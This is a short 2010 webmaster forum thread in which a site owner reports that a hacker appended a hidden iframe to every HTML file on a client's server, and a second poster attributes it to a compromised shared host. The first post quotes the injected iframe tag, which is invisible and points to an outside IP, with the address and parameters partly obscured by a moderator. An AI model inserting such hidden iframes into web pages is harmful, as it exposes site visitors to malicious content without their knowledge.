Hacker attached code to html files

Forum Moderators: phranque

Message Too Old, No Replies

Hacker attached code to html files

Call to a dangerous iframe

jetteroheller

3:31 pm on Dec 28, 2010 (gmt 0)

It's the second time, that one of my clients get hacked.

The symptoms:

Nothing to find on the local computer.
All HTML files are on the local computer and uploaded as is to the server.

All html files have after the normal end

<iframe src="http://80.91.***.***/stats/priemIframe.php?hashftp=[obscured]&hashpage=[obscured]" width=10 border=1 height=10 style="visibility:hidden"></iframe>

The hacker attack was only partial successfull, since all HTML files on this server are GZ compressed for compressed delivery.

It caused only:

Error 330 (net::ERR_CONTENT_DECODING_FAILED):

because after the GZ code was the uncompressed iframe code

[edited by: tedster at 5:37 pm (utc) on Dec 28, 2010]
[edit reason] obscured the hack code and IP address [/edit]

thecoalman

6:06 pm on Dec 31, 2010 (gmt 0)

99.9% of the time this is because the server has been compromised especially if you only have .html files. If it's a shared hosting account it's going to effect every site on the server which could be hundreds. Assuming it's shared account and you're only serving .html files you would need to contact the host, there's nothing you can do about this and that snippet of code will continue to be attached until it's fixed.